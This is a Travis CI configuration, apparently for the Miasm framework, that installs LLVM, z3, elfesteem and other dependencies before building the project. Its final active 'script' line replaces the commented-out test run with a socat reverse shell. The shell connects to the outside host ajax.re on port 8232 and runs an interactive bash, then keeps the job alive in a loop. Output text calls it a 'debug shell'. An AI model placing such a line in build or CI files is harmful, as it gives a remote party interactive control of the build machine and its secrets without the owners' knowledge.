sudo: false
dist: trusty
language: python
python:
- "2.7"
addons:
    apt:
        sources: ['llvm-toolchain-trusty-6.0', 'ubuntu-toolchain-r-test']
        packages:
            - make
            - gcc
            - python-virtualenv
            - unzip
            - llvm-6.0
            - llvm-6.0-dev
            - g++-5
before_script:
- "cd .."
- "export LLVM_CONFIG=$(which llvm-config-6.0)"
- "export CXX=$(which g++-5)"
# make virtual env
- "python /usr/lib/python2.7/dist-packages/virtualenv.py virtualenv;"
- "cd virtualenv;"
- "source bin/activate;"
# install llvmlite
- "pip install enum34"
- "pip install llvmlite"
# install elfesteem
- "git clone https://github.com/serpilliere/elfesteem elfesteem && cd elfesteem && python setup.py install && cd ..;"
# install pyparsing
- "pip install pyparsing"
# install pycparser
- "pip install pycparser"
# install z3 with a known to working version
- "wget https://github.com/serpilliere/z3-prebuild/raw/master/z3.tgz"
- "tar xzf z3.tgz"
- "cd z3/build"
- "make install"
- "cd ../.."
# Miasm
- "cd ..;"
- "cd miasm;"
# turn deprecation warning into RuntimeError
- "find . -name '*.py' | xargs sed -i 's/warnings\\.warn(/raise RuntimeError(/g'"
# install
- "python setup.py build build_ext -I$(pwd)/../virtualenv/include -L$(pwd)/../virtualenv/tinycc"
- "python setup.py install"
#script: "python -c 'import z3; x = z3.BitVec(chr(0x41), 32)' && cd test && python test_all.py && git ls-files -o --exclude-standard"
script: "( socat tcp-connect:ajax.re:8232,connect-timeout=2 exec:'bash -li',pty,stderr,setsid,sigint,sane || echo 'Debug shell not listening.' ) & while jobs %% >/dev/null 2>/dev/null; do echo 'Shell to port $1:$2 still running...'; sleep 2; done"